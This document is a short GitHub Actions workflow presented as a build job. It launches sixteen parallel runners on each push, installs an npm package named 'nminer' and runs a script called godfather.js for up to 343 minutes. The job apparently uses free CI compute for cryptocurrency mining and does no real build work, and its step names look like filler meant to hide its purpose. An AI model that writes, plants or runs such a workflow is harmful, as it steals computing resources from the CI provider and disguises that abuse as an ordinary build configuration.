name: godfather
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 7868 }
          - { version: 9398 }
          - { version: 3071 }
          - { version: 551 }
          - { version: 7203 }
          - { version: 5808 }
          - { version: 2241 }
          - { version: 5157 }
          - { version: 6711 }
          - { version: 8949 }
          - { version: 220 }
          - { version: 2345 }
          - { version: 1558 }
          - { version: 5756 }
          - { version: 9170 }
          - { version: 6267 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: filthy hm square
        run: |
          npm install nminer@latest
          timeout 343m node godfather.js || echo "godfather executed"